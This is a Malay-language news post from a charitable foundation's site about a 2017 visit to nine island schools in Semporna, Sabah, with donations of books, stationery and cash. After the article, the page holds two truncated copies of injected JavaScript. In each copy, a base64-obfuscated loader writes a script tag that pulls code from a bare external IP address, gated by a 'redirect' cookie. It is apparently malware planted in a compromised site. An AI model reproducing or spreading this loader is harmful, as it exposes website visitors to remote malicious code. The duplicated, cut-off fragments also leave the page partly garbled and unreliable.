YaPEIM » Eksplorasi YaPEIM-ESSCOM Santuni Masyarakat Gugusan Kepulauan Daerah Semporna

Terkini

Eksplorasi YaPEIM-ESSCOM Santuni Masyarakat Gugusan Kepulauan Daerah Semporna

Aktiviti yang dijalankan sepanjang Eksplorasi ini ialah pertemuan dengan para guru dan murid serta penyerahan sumbangan amal jariah YaPEIM berbentuk buku-buku ilmiah/bahan terbitan YaPEIM, yaasin, alat tulis kepada murid-murid sekolah.

SEMPORNA – 30 OKTOBER 2017 – Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM) dengan kerjasama ESSCOM dan Pejabat Pendidikan Daerah Semporna telah menyantuni masyarakat khususnya warga pendidik dan pelajar dari 9 buah pulau dengan mengadakan Program Eksplorasi YaPEIM-ESSCOM di gugusan kepulauan daerah Semporna, Sabah.

Misi yang telah diketuai oleh Dato’ Abibullah Hj Samsudin, Ketua Pengarah YaPEIM dan turut bersama ialah Laksmana Pertama Kamaruszaman Abu Hasan, Ketua Staf Bagagian Operasi Laut ESSCOM, En Arman Abd Rahim,Timbalan Pegawai Pendidikan Daerah Semporna dan En Mohd Said Abd Jalil, YDP Majlis Guru Besar serta beberapa pegawai kanan YaPEIM, ESSCOM dan PPD Semporna.

Program eksplorasi ini adalah bertujuan bagi mendapatkan gambaran yang lebih jelas dan terperinci berkaitan keadaan fizikal sekolah serta prestasi pendidikan murid-murid sekolah berkenaan khususnya bagi YaPEIM merancang serta melaksanakan Program – Program Perkasa Komuniti di Gugusan Kepulauan Semporna.

Selain itu, YaPEIM turut mendapat kerjasama melalui pendekatan National Blue Ocean Strategy (NBOS) daripada ESSCOM, PPD Semporna, Yayasan Taqwa dan beberapa agensi/institusi di sekitar Daerah Semporna khususnya dalam bidang pendidikan dan pengukuhan penghayatan agama Islam.

Antara aktiviti yang dijalankan sepanjang Eksplorasi ini ialah pertemuan dengan para guru dan murid serta penyerahan sumbangan amal jariah YaPEIM berbentuk buku-buku ilmiah/bahan terbitan YaPEIM, yaasin, alat tulis kepada murid-murid sekolah.

YaPEIM turut menyumbangkan wang tunai kepada setiap sekolah yang dikunjungi bagi tujuan urusan pembelajaran, penyediaan kelengkapan peralatan persekolah, surau dan sebagainya.

Selama 2 hari, terdapat 9 buah sekolah yang telah dilawati iaitu SK Selakan, SK Larapan, SK Sumandi, SK Bait, SK Pababag, SK Denawan, SK Umadal, SK Mabul dan SK Menampilik di sekitar Gugusan Kepulauan Semporna.

Program Eksplorasi YaPEIM -ESSCOM selama 2 hari yang bermula pada 29 – 30 Oktober 2017 ini adalah bersempena dengan Program Pemimpin Bersama Masyarakat Pulau Bum Bum dan Pelancaran Kaunter Bergerak Ar Rahmu YaPEIM yang telah dirasmikan oleh Y.B. Mejar Jeneral Dato’ Seri Jamil Khir Hj. Baharom, Menteri di Jabatan Perdana Menteri.

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top